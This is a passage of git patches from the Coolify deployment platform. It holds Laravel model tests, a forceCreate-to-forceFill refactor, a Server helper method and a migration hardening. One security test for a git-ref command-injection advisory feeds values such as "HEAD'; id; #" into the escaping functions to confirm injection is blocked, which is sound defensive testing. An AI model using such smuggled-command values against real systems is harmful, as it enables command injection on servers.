+        'last_online_at' => now()->toISOString(),
+        'public_port_timeout' => 3600,
+        'custom_docker_run_options' => '',
+        'clickhouse_db' => 'testdb',
+        'destination_type' => $this->destination->getMorphClass(),
+        'destination_id' => $this->destination->id,
+        'environment_id' => $this->environment->id,
+    ]);
+
+    expect($db->exists)->toBeTrue();
+    expect($db->uuid)->toBe('custom-ch-uuid');
+    expect($db->clickhouse_admin_user)->toBe('chadmin');
+    expect($db->clickhouse_db)->toBe('testdb');
+    expect($db->environment_id)->toBe($this->environment->id);
+});
+
+it('creates SwarmDocker with all fillable attributes', function () {
+    $swarm = SwarmDocker::create([
+        'server_id' => $this->server->id,
+        'name' => 'swarm-dest',
+        'network' => 'coolify-swarm',
+    ]);
+
+    expect($swarm->exists)->toBeTrue();
+    expect($swarm->server_id)->toBe($this->server->id);
+    expect($swarm->name)->toBe('swarm-dest');
+    expect($swarm->network)->toBe('coolify-swarm');
+});
+
+it('creates StandaloneDocker with all fillable attributes', function () {
+    $docker = StandaloneDocker::create([
+        'server_id' => $this->server->id,
+        'name' => 'standalone-dest',
+        'network' => 'coolify-standalone',
+    ]);
+
+    expect($docker->exists)->toBeTrue();
+    expect($docker->server_id)->toBe($this->server->id);
+    expect($docker->name)->toBe('standalone-dest');
+    expect($docker->network)->toBe('coolify-standalone');
+});
+
+it('creates ScheduledTask with all fillable attributes', function () {
+    $app = Application::create([
+        'name' => 'task-test-app',
+        'git_repository' => 'https://github.com/test/repo',
+        'git_branch' => 'main',
+        'build_pack' => 'nixpacks',
+        'ports_exposes' => '3000',
+        'environment_id' => $this->environment->id,
+        'destination_id' => $this->destination->id,
+        'destination_type' => $this->destination->getMorphClass(),
+    ]);
+
+    $task = ScheduledTask::create([
+        'uuid' => 'custom-task-uuid',
+        'enabled' => true,
+        'name' => 'Full Fillable Task',
+        'command' => 'php artisan schedule:run',
+        'frequency' => '* * * * *',
+        'container' => 'app',
+        'timeout' => 300,
+        'team_id' => $this->team->id,
+        'application_id' => $app->id,
+        'service_id' => null,
+    ]);
+
+    expect($task->exists)->toBeTrue();
+    expect($task->uuid)->toBe('custom-task-uuid');
+    expect($task->name)->toBe('Full Fillable Task');
+    expect($task->command)->toBe('php artisan schedule:run');
+    expect($task->frequency)->toBe('* * * * *');
+    expect($task->container)->toBe('app');
+    expect($task->timeout)->toBe(300);
+    expect($task->team_id)->toBe($this->team->id);
+    expect($task->application_id)->toBe($app->id);
+});
+
+it('creates ScheduledDatabaseBackup with all fillable attributes', function () {
+    $db = StandalonePostgresql::create([
+        'name' => 'backup-test-pg',
+        'postgres_user' => 'user',
+        'postgres_password' => 'pass',
+        'postgres_db' => 'testdb',
+        'destination_type' => $this->destination->getMorphClass(),
+        'destination_id' => $this->destination->id,
+        'environment_id' => $this->environment->id,
+    ]);
+
+    $backup = ScheduledDatabaseBackup::create([
+        'uuid' => 'custom-backup-uuid',
+        'team_id' => $this->team->id,
+        'description' => 'Full fillable backup',
+        'enabled' => true,
+        'save_s3' => false,
+        'frequency' => '0 2 * * *',
+        'database_backup_retention_amount_locally' => 10,
+        'database_type' => $db->getMorphClass(),
+        'database_id' => $db->id,
+        's3_storage_id' => null,
+        'databases_to_backup' => 'testdb',
+        'dump_all' => false,
+        'database_backup_retention_days_locally' => 30,
+        'database_backup_retention_max_storage_locally' => 5000,
+        'database_backup_retention_amount_s3' => 20,
+        'database_backup_retention_days_s3' => 60,
+        'database_backup_retention_max_storage_s3' => 10000,
+        'timeout' => 600,
+        'disable_local_backup' => false,
+    ]);
+
+    expect($backup->exists)->toBeTrue();
+    expect($backup->uuid)->toBe('custom-backup-uuid');
+    expect($backup->frequency)->toBe('0 2 * * *');
+    expect($backup->database_backup_retention_amount_locally)->toBe(10);
+    expect($backup->databases_to_backup)->toBe('testdb');
+    expect($backup->timeout)->toBe(600);
+});
+
+it('creates ScheduledDatabaseBackupExecution with all fillable attributes', function () {
+    $db = StandalonePostgresql::create([
+        'name' => 'exec-test-pg',
+        'postgres_user' => 'user',
+        'postgres_password' => 'pass',
+        'postgres_db' => 'testdb',
+        'destination_type' => $this->destination->getMorphClass(),
+        'destination_id' => $this->destination->id,
+        'environment_id' => $this->environment->id,
+    ]);
+    $backup = ScheduledDatabaseBackup::create([
+        'frequency' => '0 2 * * *',
+        'database_type' => $db->getMorphClass(),
+        'database_id' => $db->id,
+        'team_id' => $this->team->id,
+    ]);
+
+    $execution = ScheduledDatabaseBackupExecution::create([
+        'uuid' => 'custom-exec-uuid',
+        'scheduled_database_backup_id' => $backup->id,
+        'status' => 'success',
+        'message' => 'Backup completed successfully',
+        'size' => 1048576,
+        'filename' => 'backup-2026-03-31.sql.gz',
+        'database_name' => 'testdb',
+        'finished_at' => now()->toISOString(),
+        'local_storage_deleted' => false,
+        's3_storage_deleted' => false,
+        's3_uploaded' => false,
+    ]);
+
+    expect($execution->exists)->toBeTrue();
+    expect($execution->uuid)->toBe('custom-exec-uuid');
+    expect($execution->status)->toBe('success');
+    expect($execution->filename)->toBe('backup-2026-03-31.sql.gz');
+    expect($execution->database_name)->toBe('testdb');
+    expect($execution->size)->toBe(1048576);
+});
+
+it('creates ScheduledTaskExecution with all fillable attributes', function () {
+    $app = Application::create([
+        'name' => 'task-exec-app',
+        'git_repository' => 'https://github.com/test/repo',
+        'git_branch' => 'main',
+        'build_pack' => 'nixpacks',
+        'ports_exposes' => '3000',
+        'environment_id' => $this->environment->id,
+        'destination_id' => $this->destination->id,
+        'destination_type' => $this->destination->getMorphClass(),
+    ]);
+    $task = ScheduledTask::create([
+        'name' => 'exec-test-task',
+        'command' => 'echo hello',
+        'frequency' => '* * * * *',
+        'timeout' => 60,
+        'team_id' => $this->team->id,
+        'application_id' => $app->id,
+    ]);
+
+    $execution = ScheduledTaskExecution::create([
+        'scheduled_task_id' => $task->id,
+        'status' => 'success',
+        'message' => 'Task completed successfully',
+        'finished_at' => now()->toISOString(),
+        'started_at' => now()->subMinute()->toISOString(),
+        'retry_count' => 0,
+        'duration' => 60,
+        'error_details' => null,
+    ]);
+
+    expect($execution->exists)->toBeTrue();
+    expect($execution->scheduled_task_id)->toBe($task->id);
+    expect($execution->status)->toBe('success');
+    expect((float) $execution->duration)->toBe(60.0);
+    expect($execution->retry_count)->toBe(0);
+});
+
+it('creates GithubApp with all fillable attributes', function () {
+    $githubApp = GithubApp::create([
+        'team_id' => $this->team->id,
+        'private_key_id' => $this->server->private_key_id,
+        'name' => 'Full Fillable GH App',
+        'organization' => 'coollabsio',
+        'api_url' => 'https://api.github.com',
+        'html_url' => 'https://github.com',
+        'custom_user' => 'git',
+        'custom_port' => 22,
+        'app_id' => 12345,
+        'installation_id' => 67890,
+        'client_id' => 'Iv1.abc123',
+        'client_secret' => 'secret-456',
+        'webhook_secret' => 'whsec-789',
+        'is_system_wide' => false,
+        'is_public' => false,
+        'contents' => 'read',
+        'metadata' => 'read',
+        'pull_requests' => 'write',
+        'administration' => 'read',
+    ]);
+
+    expect($githubApp->exists)->toBeTrue();
+    expect($githubApp->name)->toBe('Full Fillable GH App');
+    expect($githubApp->organization)->toBe('coollabsio');
+    expect($githubApp->app_id)->toBe(12345);
+    expect($githubApp->installation_id)->toBe(67890);
+    expect($githubApp->client_id)->toBe('Iv1.abc123');
+    expect($githubApp->team_id)->toBe($this->team->id);
+    expect($githubApp->private_key_id)->toBe($this->server->private_key_id);
+});
+
+it('creates Subscription with all fillable attributes', function () {
+    $sub = Subscription::create([
+        'team_id' => $this->team->id,
+        'stripe_invoice_paid' => true,
+        'stripe_subscription_id' => 'sub_1234567890',
+        'stripe_customer_id' => 'cus_1234567890',
+        'stripe_cancel_at_period_end' => false,
+        'stripe_plan_id' => 'price_1234567890',
+        'stripe_feedback' => 'Great service',
+        'stripe_comment' => 'Will renew',
+        'stripe_trial_already_ended' => true,
+        'stripe_past_due' => false,
+        'stripe_refunded_at' => null,
+    ]);
+
+    expect($sub->exists)->toBeTrue();
+    expect($sub->team_id)->toBe($this->team->id);
+    expect($sub->stripe_subscription_id)->toBe('sub_1234567890');
+    expect($sub->stripe_customer_id)->toBe('cus_1234567890');
+    expect($sub->stripe_plan_id)->toBe('price_1234567890');
+    expect($sub->stripe_invoice_paid)->toBeTrue();
+});
+
+it('creates CloudProviderToken with all fillable attributes', function () {
+    $token = CloudProviderToken::create([
+        'team_id' => $this->team->id,
+        'provider' => 'hetzner',
+        'token' => 'hcloud-token-abc123',
+        'name' => 'My Hetzner Token',
+    ]);
+
+    expect($token->exists)->toBeTrue();
+    expect($token->team_id)->toBe($this->team->id);
+    expect($token->provider)->toBe('hetzner');
+    expect($token->token)->toBe('hcloud-token-abc123');
+    expect($token->name)->toBe('My Hetzner Token');
+});
+
+it('creates Tag with all fillable attributes', function () {
+    $tag = Tag::create([
+        'name' => 'production',
+        'team_id' => $this->team->id,
+    ]);
+
+    expect($tag->exists)->toBeTrue();
+    expect($tag->name)->toBe('production');
+    expect($tag->team_id)->toBe($this->team->id);
+});
diff --git a/tests/Feature/ServiceDatabaseTeamTest.php b/tests/Feature/ServiceDatabaseTeamTest.php
index ae3cba4d3..5fe7e39d2 100644
--- a/tests/Feature/ServiceDatabaseTeamTest.php
+++ b/tests/Feature/ServiceDatabaseTeamTest.php
@@ -14,18 +14,18 @@
 it('returns the correct team through the service relationship chain', function () {
     $team = Team::factory()->create();
 
-    $project = Project::forceCreate([
+    $project = Project::create([
         'uuid' => (string) Str::uuid(),
         'name' => 'Test Project',
         'team_id' => $team->id,
     ]);
 
-    $environment = Environment::forceCreate([
+    $environment = Environment::create([
         'name' => 'test-env-'.Str::random(8),
         'project_id' => $project->id,
     ]);
 
-    $service = Service::forceCreate([
+    $service = Service::create([
         'uuid' => (string) Str::uuid(),
         'name' => 'supabase',
         'environment_id' => $environment->id,
@@ -34,7 +34,7 @@
         'docker_compose_raw' => 'version: "3"',
     ]);
 
-    $serviceDatabase = ServiceDatabase::forceCreate([
+    $serviceDatabase = ServiceDatabase::create([
         'uuid' => (string) Str::uuid(),
         'name' => 'supabase-db',
         'service_id' => $service->id,
@@ -47,18 +47,18 @@
 it('returns the correct team for ServiceApplication through the service relationship chain', function () {
     $team = Team::factory()->create();
 
-    $project = Project::forceCreate([
+    $project = Project::create([
         'uuid' => (string) Str::uuid(),
         'name' => 'Test Project',
         'team_id' => $team->id,
     ]);
 
-    $environment = Environment::forceCreate([
+    $environment = Environment::create([
         'name' => 'test-env-'.Str::random(8),
         'project_id' => $project->id,
     ]);
 
-    $service = Service::forceCreate([
+    $service = Service::create([
         'uuid' => (string) Str::uuid(),
         'name' => 'supabase',
         'environment_id' => $environment->id,
@@ -67,7 +67,7 @@
         'docker_compose_raw' => 'version: "3"',
     ]);
 
-    $serviceApplication = ServiceApplication::forceCreate([
+    $serviceApplication = ServiceApplication::create([
         'uuid' => (string) Str::uuid(),
         'name' => 'supabase-studio',
         'service_id' => $service->id,
diff --git a/tests/Feature/StorageApiTest.php b/tests/Feature/StorageApiTest.php
index bd9d727c4..75357e41e 100644
--- a/tests/Feature/StorageApiTest.php
+++ b/tests/Feature/StorageApiTest.php
@@ -49,7 +49,7 @@ function createTestApplication($context): Application
 
 function createTestDatabase($context): StandalonePostgresql
 {
-    return StandalonePostgresql::forceCreate([
+    return StandalonePostgresql::create([
         'name' => 'test-postgres',
         'image' => 'postgres:15-alpine',
         'postgres_user' => 'postgres',
diff --git a/tests/Unit/GitRefValidationTest.php b/tests/Unit/GitRefValidationTest.php
index 58d07f4b7..f82dcb863 100644
--- a/tests/Unit/GitRefValidationTest.php
+++ b/tests/Unit/GitRefValidationTest.php
@@ -1,12 +1,14 @@
 <?php
 
+use App\Models\Application;
+use App\Models\ApplicationSetting;
+
 /**
  * Security tests for git ref validation (GHSA-mw5w-2vvh-mgf4).
  *
  * Ensures that git_commit_sha and related inputs are validated
  * to prevent OS command injection via shell metacharacters.
  */
-
 describe('validateGitRef', function () {
     test('accepts valid hex commit SHAs', function () {
         expect(validateGitRef('abc123def456'))->toBe('abc123def456');
@@ -93,31 +95,31 @@
 describe('executeInDocker git log escaping', function () {
     test('git log command escapes commit SHA to prevent injection', function () {
         $maliciousCommit = "HEAD'; id; #";
-        $command = "cd /workdir && git log -1 ".escapeshellarg($maliciousCommit).' --pretty=%B';
+        $command = 'cd /workdir && git log -1 '.escapeshellarg($maliciousCommit).' --pretty=%B';
         $result = executeInDocker('test-container', $command);
 
         // The malicious payload must not be able to break out of quoting
-        expect($result)->not->toContain("id;");
+        expect($result)->not->toContain('id;');
         expect($result)->toContain("'HEAD'\\''");
     });
 });
 
 describe('buildGitCheckoutCommand escaping', function () {
     test('checkout command escapes target to prevent injection', function () {
-        $app = new \App\Models\Application;
-        $app->forceFill(['uuid' => 'test-uuid']);
+        $app = new Application;
+        $app->fill(['uuid' => 'test-uuid']);
 
-        $settings = new \App\Models\ApplicationSetting;
+        $settings = new ApplicationSetting;
         $settings->is_git_submodules_enabled = false;
         $app->setRelation('settings', $settings);
 
-        $method = new \ReflectionMethod($app, 'buildGitCheckoutCommand');
+        $method = new ReflectionMethod($app, 'buildGitCheckoutCommand');
 
         $result = $method->invoke($app, 'abc123');
         expect($result)->toContain("git checkout 'abc123'");
 
         $result = $method->invoke($app, "abc'; id; #");
-        expect($result)->not->toContain("id;");
+        expect($result)->not->toContain('id;');
         expect($result)->toContain("git checkout 'abc'");
     });
 });
diff --git a/tests/Unit/ModelFillableRegressionTest.php b/tests/Unit/ModelFillableRegressionTest.php
new file mode 100644
index 000000000..eff477c5a
--- /dev/null
+++ b/tests/Unit/ModelFillableRegressionTest.php
@@ -0,0 +1,76 @@
+<?php
+
+use App\Models\Application;
+use App\Models\ApplicationDeploymentQueue;
+use App\Models\ApplicationPreview;
+use App\Models\ApplicationSetting;
+use App\Models\CloudProviderToken;
+use App\Models\Environment;
+use App\Models\GithubApp;
+use App\Models\Project;
+use App\Models\ProjectSetting;
+use App\Models\ScheduledDatabaseBackup;
+use App\Models\ScheduledDatabaseBackupExecution;
+use App\Models\ScheduledTask;
+use App\Models\ScheduledTaskExecution;
+use App\Models\Server;
+use App\Models\ServerSetting;
+use App\Models\Service;
+use App\Models\ServiceApplication;
+use App\Models\ServiceDatabase;
+use App\Models\StandaloneClickhouse;
+use App\Models\StandaloneDocker;
+use App\Models\StandaloneDragonfly;
+use App\Models\StandaloneKeydb;
+use App\Models\StandaloneMariadb;
+use App\Models\StandaloneMongodb;
+use App\Models\StandaloneMysql;
+use App\Models\StandalonePostgresql;
+use App\Models\StandaloneRedis;
+use App\Models\Subscription;
+use App\Models\SwarmDocker;
+use App\Models\Tag;
+use App\Models\User;
+
+it('keeps required mass-assignment attributes fillable for internal create flows', function (string $modelClass, array $expectedAttributes) {
+    $model = new $modelClass;
+
+    expect($model->getFillable())->toContain(...$expectedAttributes);
+})->with([
+    // Relationship/ownership keys
+    [CloudProviderToken::class, ['team_id']],
+    [Tag::class, ['team_id']],
+    [Subscription::class, ['team_id']],
+    [ScheduledTaskExecution::class, ['scheduled_task_id']],
+    [ScheduledDatabaseBackupExecution::class, ['uuid', 'scheduled_database_backup_id']],
+    [ScheduledDatabaseBackup::class, ['uuid', 'team_id']],
+    [ScheduledTask::class, ['uuid', 'team_id', 'application_id', 'service_id']],
+    [ServiceDatabase::class, ['service_id']],
+    [ServiceApplication::class, ['service_id']],
+    [ApplicationDeploymentQueue::class, ['docker_registry_image_tag']],
+    [Project::class, ['team_id', 'uuid']],
+    [Environment::class, ['project_id', 'uuid']],
+    [ProjectSetting::class, ['project_id']],
+    [ApplicationSetting::class, ['application_id']],
+    [ServerSetting::class, ['server_id']],
+    [SwarmDocker::class, ['server_id']],
+    [StandaloneDocker::class, ['server_id']],
+    [User::class, ['pending_email', 'email_change_code', 'email_change_code_expires_at']],
+    [Server::class, ['ip_previous']],
+    [GithubApp::class, ['team_id', 'private_key_id']],
+
+    // Application/Service resource keys (including uuid for clone flows)
+    [Application::class, ['uuid', 'environment_id', 'destination_id', 'destination_type', 'source_id', 'source_type', 'repository_project_id', 'private_key_id']],
+    [ApplicationPreview::class, ['uuid', 'application_id']],
+    [Service::class, ['uuid', 'environment_id', 'server_id', 'destination_id', 'destination_type']],
+
+    // Standalone database resource keys (including uuid for clone flows)
+    [StandalonePostgresql::class, ['uuid', 'destination_type', 'destination_id', 'environment_id']],
+    [StandaloneMysql::class, ['uuid', 'destination_type', 'destination_id', 'environment_id']],
+    [StandaloneMariadb::class, ['uuid', 'destination_type', 'destination_id', 'environment_id']],
+    [StandaloneMongodb::class, ['uuid', 'destination_type', 'destination_id', 'environment_id']],
+    [StandaloneRedis::class, ['uuid', 'destination_type', 'destination_id', 'environment_id']],
+    [StandaloneKeydb::class, ['uuid', 'destination_type', 'destination_id', 'environment_id']],
+    [StandaloneDragonfly::class, ['uuid', 'destination_type', 'destination_id', 'environment_id']],
+    [StandaloneClickhouse::class, ['uuid', 'destination_type', 'destination_id', 'environment_id']],
+]);
diff --git a/tests/Unit/ServiceParserImageUpdateTest.php b/tests/Unit/ServiceParserImageUpdateTest.php
index 649795866..f672b64f5 100644
--- a/tests/Unit/ServiceParserImageUpdateTest.php
+++ b/tests/Unit/ServiceParserImageUpdateTest.php
@@ -16,8 +16,8 @@
     expect($parsersFile)
         ->toContain("\$databaseFound = ServiceDatabase::where('name', \$serviceName)->where('service_id', \$resource->id)->first();")
         ->toContain("\$applicationFound = ServiceApplication::where('name', \$serviceName)->where('service_id', \$resource->id)->first();")
-        ->toContain("forceCreate([\n                        'name' => \$serviceName,\n                        'service_id' => \$resource->id,\n                    ]);")
-        ->not->toContain("forceCreate([\n                        'name' => \$serviceName,\n                        'image' => \$image,\n                        'service_id' => \$resource->id,\n                    ]);");
+        ->toContain("create([\n                        'name' => \$serviceName,\n                        'service_id' => \$resource->id,\n                    ]);")
+        ->not->toContain("create([\n                        'name' => \$serviceName,\n                        'image' => \$image,\n                        'service_id' => \$resource->id,\n                    ]);");
 });
 
 it('ensures service parser updates image after finding or creating service', function () {
@@ -41,8 +41,8 @@
     // The new code checks for null within the else block and creates only if needed
     expect($sharedFile)
         ->toContain('if (is_null($savedService)) {')
-        ->toContain('$savedService = ServiceDatabase::forceCreate([')
-        ->toContain('$savedService = ServiceApplication::forceCreate([');
+        ->toContain('$savedService = ServiceDatabase::create([')
+        ->toContain('$savedService = ServiceApplication::create([');
 });
 
 it('verifies image update logic is present in parseDockerComposeFile', function () {
diff --git a/tests/v4/Browser/DashboardTest.php b/tests/v4/Browser/DashboardTest.php
index 233b0db9d..b4a97f268 100644
--- a/tests/v4/Browser/DashboardTest.php
+++ b/tests/v4/Browser/DashboardTest.php
@@ -77,21 +77,21 @@
         ],
     ]);
 
-    Project::forceCreate([
+    Project::create([
         'uuid' => 'project-1',
         'name' => 'My first project',
         'description' => 'This is a test project in development',
         'team_id' => 0,
     ]);
 
-    Project::forceCreate([
+    Project::create([
         'uuid' => 'project-2',
         'name' => 'Production API',
         'description' => 'Backend services for production',
         'team_id' => 0,
     ]);
 
-    Project::forceCreate([
+    Project::create([
         'uuid' => 'project-3',
         'name' => 'Staging Environment',
         'description' => 'Staging and QA testing',

From a77e1f47d1af81724d26bbaf57870deac730ec26 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 31 Mar 2026 13:50:37 +0200
Subject: [PATCH 208/213] fix(models): replace forceCreate with forceFill+save
 pattern

Replaces Model::forceCreate([...]) calls with (new Model)->forceFill([...])->save()
across SettingsBackup, Server, and User models to avoid bypassing Eloquent
model event lifecycle during record creation.
---
 app/Livewire/SettingsBackup.php |  4 +++-
 app/Models/Server.php           | 12 ++++++------
 app/Models/User.php             |  6 ++++--
 3 files changed, 13 insertions(+), 9 deletions(-)

diff --git a/app/Livewire/SettingsBackup.php b/app/Livewire/SettingsBackup.php
index a111a6096..5336c0c9a 100644
--- a/app/Livewire/SettingsBackup.php
+++ b/app/Livewire/SettingsBackup.php
@@ -83,7 +83,8 @@ public function addCoolifyDatabase()
             $postgres_password = $envs['POSTGRES_PASSWORD'];
             $postgres_user = $envs['POSTGRES_USER'];
             $postgres_db = $envs['POSTGRES_DB'];
-            $this->database = StandalonePostgresql::forceCreate([
+            $this->database = new StandalonePostgresql;
+            $this->database->forceFill([
                 'id' => 0,
                 'name' => 'coolify-db',
                 'description' => 'Coolify database',
@@ -94,6 +95,7 @@ public function addCoolifyDatabase()
                 'destination_type' => StandaloneDocker::class,
                 'destination_id' => 0,
             ]);
+            $this->database->save();
             $this->backup = ScheduledDatabaseBackup::create([
                 'id' => 0,
                 'enabled' => true,
diff --git a/app/Models/Server.php b/app/Models/Server.php
index a18fe14ae..918b44270 100644
--- a/app/Models/Server.php
+++ b/app/Models/Server.php
@@ -143,28 +143,28 @@ protected static function booted()
             }
         });
         static::created(function ($server) {
-            ServerSetting::forceCreate([
+            ServerSetting::create([
                 'server_id' => $server->id,
             ]);
             if ($server->id === 0) {
                 if ($server->isSwarm()) {
-                    SwarmDocker::forceCreate([
+                    (new SwarmDocker)->forceFill([
                         'id' => 0,
                         'name' => 'coolify',
                         'network' => 'coolify-overlay',
                         'server_id' => $server->id,
-                    ]);
+                    ])->save();
                 } else {
-                    StandaloneDocker::forceCreate([
+                    (new StandaloneDocker)->forceFill([
                         'id' => 0,
                         'name' => 'coolify',
                         'network' => 'coolify',
                         'server_id' => $server->id,
-                    ]);
+                    ])->saveQuietly();
                 }
             } else {
                 if ($server->isSwarm()) {
-                    SwarmDocker::forceCreate([
+                    SwarmDocker::create([
                         'name' => 'coolify-overlay',
                         'network' => 'coolify-overlay',
                         'server_id' => $server->id,
diff --git a/app/Models/User.php b/app/Models/User.php
index aa33a49fb..3199d2024 100644
--- a/app/Models/User.php
+++ b/app/Models/User.php
@@ -98,7 +98,8 @@ protected static function boot()
                 $team['id'] = 0;
                 $team['name'] = 'Root Team';
             }
-            $new_team = Team::forceCreate($team);
+            $new_team = (new Team)->forceFill($team);
+            $new_team->save();
             $user->teams()->attach($new_team, ['role' => 'owner']);
         });
 
@@ -201,7 +202,8 @@ public function recreate_personal_team()
             $team['id'] = 0;
             $team['name'] = 'Root Team';
         }
-        $new_team = Team::forceCreate($team);
+        $new_team = (new Team)->forceFill($team);
+        $new_team->save();
         $this->teams()->attach($new_team, ['role' => 'owner']);
 
         return $new_team;

From 4f6e1f7e4271840bc9ab3cbe82953596f39ded7e Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 31 Mar 2026 13:52:39 +0200
Subject: [PATCH 209/213] style(navbar): use tracking-tight instead of
 tracking-wide for logo

---
 resources/views/components/navbar.blade.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/resources/views/components/navbar.blade.php b/resources/views/components/navbar.blade.php
index 48b544ebb..da9a112f8 100644
--- a/resources/views/components/navbar.blade.php
+++ b/resources/views/components/navbar.blade.php
@@ -79,7 +79,7 @@
     }">
     <div class="flex lg:pt-6 pt-4 pb-4 pl-2">
         <div class="flex flex-col w-full">
-            <a href="/" {{ wireNavigate() }} class="text-2xl font-bold tracking-wide dark:text-white hover:opacity-80 transition-opacity">Coolify</a>
+            <a href="/" {{ wireNavigate() }} class="text-2xl font-bold tracking-tight dark:text-white hover:opacity-80 transition-opacity">Coolify</a>
             <x-version />
         </div>
         <div>

From f01953d361f05009134e5828728bdb242dad4ef6 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 31 Mar 2026 14:41:40 +0200
Subject: [PATCH 210/213] fix(models): add missing uuid to StandaloneDocker
 initialization

---
 app/Models/Server.php | 1 +
 1 file changed, 1 insertion(+)

diff --git a/app/Models/Server.php b/app/Models/Server.php
index 918b44270..32100a775 100644
--- a/app/Models/Server.php
+++ b/app/Models/Server.php
@@ -158,6 +158,7 @@ protected static function booted()
                     (new StandaloneDocker)->forceFill([
                         'id' => 0,
                         'name' => 'coolify',
+                        'uuid' => (string) new Cuid2,
                         'network' => 'coolify',
                         'server_id' => $server->id,
                     ])->saveQuietly();

From 466eb8504e0473b97a915397c01b0c3775d6610c Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 31 Mar 2026 14:44:45 +0200
Subject: [PATCH 211/213] refactor(models): extract
 defaultStandaloneDockerAttributes method on Server

Extract duplicated inline StandaloneDocker attribute arrays in the
Server boot lifecycle into a dedicated method, eliminating repetition
between the root-server (id=0) and normal-server paths.

Also harden the shared_environment_variables migration by wrapping
DDL statements in DB::transaction() and using DROP CONSTRAINT IF EXISTS
to make the migration safely re-runnable.

Add unit test covering the extracted method to verify uuid is always
present in bootstrap attributes.
---
 app/Models/Server.php                         | 33 ++++++++++++-------
 ..._to_shared_environment_variables_table.php | 32 +++++++++++-------
 ...rverBootstrapDestinationAttributesTest.php | 20 +++++++++++
 3 files changed, 61 insertions(+), 24 deletions(-)
 create mode 100644 tests/Unit/ServerBootstrapDestinationAttributesTest.php

diff --git a/app/Models/Server.php b/app/Models/Server.php
index 6b59654ef..06426f211 100644
--- a/app/Models/Server.php
+++ b/app/Models/Server.php
@@ -155,12 +155,7 @@ protected static function booted()
                         'server_id' => $server->id,
                     ])->save();
                 } else {
-                    (new StandaloneDocker)->forceFill([
-                        'id' => 0,
-                        'name' => 'coolify',
-                        'network' => 'coolify',
-                        'server_id' => $server->id,
-                    ])->saveQuietly();
+                    (new StandaloneDocker)->forceFill($server->defaultStandaloneDockerAttributes(id: 0))->saveQuietly();
                 }
             } else {
                 if ($server->isSwarm()) {
@@ -171,12 +166,7 @@ protected static function booted()
                     ]);
                 } else {
                     $standaloneDocker = new StandaloneDocker;
-                    $standaloneDocker->forceFill([
-                        'name' => 'coolify',
-                        'uuid' => (string) new Cuid2,
-                        'network' => 'coolify',
-                        'server_id' => $server->id,
-                    ]);
+                    $standaloneDocker->forceFill($server->defaultStandaloneDockerAttributes());
                     $standaloneDocker->saveQuietly();
                 }
             }
@@ -1043,6 +1033,25 @@ public function team()
         return $this->belongsTo(Team::class);
     }
 
+    /**
+     * @return array{id?: int, name: string, uuid: string, network: string, server_id: int}
+     */
+    public function defaultStandaloneDockerAttributes(?int $id = null): array
+    {
+        $attributes = [
+            'name' => 'coolify',
+            'uuid' => (string) new Cuid2,
+            'network' => 'coolify',
+            'server_id' => $this->id,
+        ];
+
+        if (! is_null($id)) {
+            $attributes['id'] = $id;
+        }
+
+        return $attributes;
+    }
+
     public function environment_variables()
     {
         return $this->hasMany(SharedEnvironmentVariable::class)->where('type', 'server');
diff --git a/database/migrations/2025_12_24_095507_add_server_to_shared_environment_variables_table.php b/database/migrations/2025_12_24_095507_add_server_to_shared_environment_variables_table.php
index 0207ed955..a6a6fe872 100644
--- a/database/migrations/2025_12_24_095507_add_server_to_shared_environment_variables_table.php
+++ b/database/migrations/2025_12_24_095507_add_server_to_shared_environment_variables_table.php
@@ -5,17 +5,23 @@
 use Illuminate\Support\Facades\DB;
 use Illuminate\Support\Facades\Schema;
 
-return new class extends Migration {
+return new class extends Migration
+{
     /**
      * Run the migrations.
      */
     public function up(): void
     {
-        DB::statement("ALTER TABLE shared_environment_variables DROP CONSTRAINT shared_environment_variables_type_check");
-        DB::statement("ALTER TABLE shared_environment_variables ADD CONSTRAINT shared_environment_variables_type_check CHECK (type IN ('team', 'project', 'environment', 'server'))");
-        Schema::table('shared_environment_variables', function (Blueprint $table) {
-            $table->foreignId('server_id')->nullable()->constrained()->onDelete('cascade');
-            $table->unique(['key', 'server_id', 'team_id']);
+        DB::transaction(function () {
+            DB::statement('ALTER TABLE shared_environment_variables DROP CONSTRAINT IF EXISTS shared_environment_variables_type_check');
+            DB::statement("ALTER TABLE shared_environment_variables ADD CONSTRAINT shared_environment_variables_type_check CHECK (type IN ('team', 'project', 'environment', 'server'))");
+            Schema::table('shared_environment_variables', function (Blueprint $table) {
+                $table->foreignId('server_id')->nullable()->constrained()->onDelete('cascade');
+                // NULL != NULL in PostgreSQL unique indexes, so this only enforces uniqueness
+                // for server-scoped rows (where server_id is non-null). Other scopes are covered
+                // by existing unique constraints on ['key', 'project_id', 'team_id'] and ['key', 'environment_id', 'team_id'].
+                $table->unique(['key', 'server_id', 'team_id']);
+            });
         });
     }
 
@@ -24,12 +30,14 @@ public function up(): void
      */
     public function down(): void
     {
-        Schema::table('shared_environment_variables', function (Blueprint $table) {
-            $table->dropUnique(['key', 'server_id', 'team_id']);
-            $table->dropForeign(['server_id']);
-            $table->dropColumn('server_id');
+        DB::transaction(function () {
+            Schema::table('shared_environment_variables', function (Blueprint $table) {
+                $table->dropUnique(['key', 'server_id', 'team_id']);
+                $table->dropForeign(['server_id']);
+                $table->dropColumn('server_id');
+            });
+            DB::statement('ALTER TABLE shared_environment_variables DROP CONSTRAINT IF EXISTS shared_environment_variables_type_check');
+            DB::statement("ALTER TABLE shared_environment_variables ADD CONSTRAINT shared_environment_variables_type_check CHECK (type IN ('team', 'project', 'environment'))");
         });
-        DB::statement("ALTER TABLE shared_environment_variables DROP CONSTRAINT shared_environment_variables_type_check");
-        DB::statement("ALTER TABLE shared_environment_variables ADD CONSTRAINT shared_environment_variables_type_check CHECK (type IN ('team', 'project', 'environment'))");
     }
 };
diff --git a/tests/Unit/ServerBootstrapDestinationAttributesTest.php b/tests/Unit/ServerBootstrapDestinationAttributesTest.php
new file mode 100644
index 000000000..e9d229fc2
--- /dev/null
+++ b/tests/Unit/ServerBootstrapDestinationAttributesTest.php
@@ -0,0 +1,20 @@
+<?php
+
+use App\Models\Server;
+
+it('includes a uuid in standalone docker bootstrap attributes for the root server path', function () {
+    $server = new Server;
